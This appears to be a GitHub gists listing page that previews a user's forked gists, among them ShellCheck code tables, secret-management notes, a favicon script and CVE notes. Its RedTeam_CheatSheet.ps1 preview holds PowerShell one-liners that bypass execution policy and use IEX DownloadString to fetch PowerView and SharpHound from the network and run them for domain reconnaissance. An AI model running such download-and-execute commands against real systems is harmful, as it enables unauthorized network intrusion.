- SC1000 $ is not used specially and should therefore be escaped.
- SC1001 This
\owill be a regular 'o' in this context. - SC1003 Want to escape a single quote? echo 'This is how it'\''s done'.
- SC1004 This backslash+linefeed is literal. Break outside single quotes if you just want to break the line.
- SC1007 Remove space after = if trying to assign a value (or for empty string, use var='' ... ).
- SC1008 This shebang was unrecognized. ShellCheck only supports sh/bash/dash/ksh. Add a 'shell' directive to specify.
- SC1009 The mentioned parser error was in ...
- SC1010 Use semicolo
harmzway harmzway
harmzway
/ _shellcheck.csv
Created
December 16, 2021 04:15
— forked from eggplants/_shellcheck.csv
Enumerated shellcheck codes https://github.com/koalaman/shellcheck/wiki/Checks (Update: 05-21-2021)
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 9.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "name","link","description" | |
| "SC1000","https://github.com/koalaman/shellcheck/wiki/SC1000","$ is not used specially and should therefore be escaped." | |
| "SC1001","https://github.com/koalaman/shellcheck/wiki/SC1001","This `\o` will be a regular 'o' in this context." | |
| "SC1003","https://github.com/koalaman/shellcheck/wiki/SC1003","Want to escape a single quote? echo 'This is how it'\\''s done'." | |
| "SC1004","https://github.com/koalaman/shellcheck/wiki/SC1004","This backslash+linefeed is literal. Break outside single quotes if you just want to break the line." | |
| "SC1007","https://github.com/koalaman/shellcheck/wiki/SC1007","Remove space after = if trying to assign a value (or for empty string, use var='' ... )." | |
| "SC1008","https://github.com/koalaman/shellcheck/wiki/SC1008","This shebang was unrecognized. ShellCheck only supports sh/bash/dash/ksh. Add a 'shell' directive to specify." | |
| "SC1009","https://github.com/koalaman/shellcheck/wiki/SC1009","The mentioned parser error was in ..." | |
| "SC1010","https://github.com/koalaman/sh |
harmzway
/ _shellcheck.md
Created
December 16, 2021 04:07
— forked from nicerobot/_shellcheck.md
Enumerated shellcheck codes https://github.com/koalaman/shellcheck/wiki/Checks
harmzway
/ log4j_rce_check.py
Created
December 11, 2021 01:49
— forked from byt3bl33d3r/log4j_rce_check.py
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| ''' | |
| Needs Requests (pip3 install requests) | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
| This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
harmzway
/ infra-secret-management-overview.md
Created
September 2, 2021 10:49
— forked from maxvt/infra-secret-management-overview.md
Infrastructure Secret Management Software Overview
Currently, there is an explosion of tools that aim to manage secrets for automated, cloud native infrastructure management. Daniel Somerfield did some work classifying the various approaches, but (as far as I know) no one has made a recent effort to summarize the various tools.
This is an attempt to give a quick overview of what can be found out there. The list is alphabetical. There will be tools that are missing, and some of the facts might be wrong--I welcome your corrections. For the purpose, I can be reached via @maxvt on Twitter, or just leave me a comment here.
There is a companion feature matrix of various tools. Comments are welcome in the same manner.
harmzway
/ YouTube-OAuth-Snippets
Created
September 11, 2020 00:19
— forked from CoreyMSchafer/YouTube-OAuth-Snippets
YouTube-OAuth-Snippets
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # token.pickle stores the user's credentials from previously successful logins | |
| if os.path.exists('token.pickle'): | |
| print('Loading Credentials From File...') | |
| with open('token.pickle', 'rb') as token: | |
| credentials = pickle.load(token) | |
| # Google's Request | |
| from google.auth.transport.requests import Request |
harmzway
/ RedTeam_CheatSheet.ps1
Created
January 16, 2020 23:09
— forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
harmzway
/ make_favicon.sh
Created
January 16, 2020 22:47
— forked from nateware/make_favicon.sh
Imagemagick to create favicon.ico with 16x16 and 32x32 sizes in it
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # IE is still braindead so still use favicon.ico | |
| convert -resize x16 -gravity center -crop 16x16+0+0 -flatten -colors 256 input.png output-16x16.ico | |
| convert -resize x32 -gravity center -crop 32x32+0+0 -flatten -colors 256 input.png output-32x32.ico | |
| convert output-16x16.ico output-32x32.ico favicon.ico | |
| # Then, HTML needs to specify size="XxY" as largest size due to browser bugs | |
| <link rel="shortcut icon" href="/favicon.ico" sizes="32x32"> |
harmzway
/ 20200114-TLP-WHITE_CVE-2020-0601.md
Created
January 16, 2020 17:33
— forked from SwitHak/20200114-TLP-WHITE_CVE-2020-0601.md
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-16 1505 UTC
- Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
- The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
- The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.
- NSA description:
- NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
harmzway
/ ssh_key_add.sh
Created
September 4, 2019 16:47
— forked from octocat/ssh_key_add.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Note: ~/.ssh/environment should not be used, as it | |
| # already has a different purpose in SSH. | |
| env=~/.ssh/agent.env | |
| # Note: Don't bother checking SSH_AGENT_PID. It's not used | |
| # by SSH itself, and it might even be incorrect | |
| # (for example, when using agent-forwarding over SSH). | |
| agent_is_running() { |
harmzway
/ git-author-rewrite.sh
Created
September 4, 2019 16:47
— forked from octocat/git-author-rewrite.sh
NewerOlder